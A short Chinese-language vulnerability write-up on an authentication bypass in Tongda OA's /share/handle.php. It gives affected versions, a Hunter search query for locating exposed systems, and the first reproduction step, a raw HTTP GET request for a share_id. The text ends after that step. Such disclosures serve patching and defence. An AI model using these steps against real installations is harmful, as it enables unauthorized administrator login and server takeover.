一、漏洞简介

通达OA（Office Anywhere网络智能办公系统）是中国通达公司的一套协同办公自动化软件。通达OA /share/handle.php存在一个认证绕过漏洞，利用该漏洞可以实现任意用户登录。攻击者可以通过构造恶意攻击代码，成功登录系统管理员账户，继而在系统后台上传恶意文件控制网站服务器。

二、影响版本

● 通达OA2017-通达OA11.8

三、资产测绘

● hunter：app.name="通达 OA"
● 登录页面

四、漏洞复现

1. 获取share_id

GET /share/handle.php?module=2&module_id=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Host: 
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close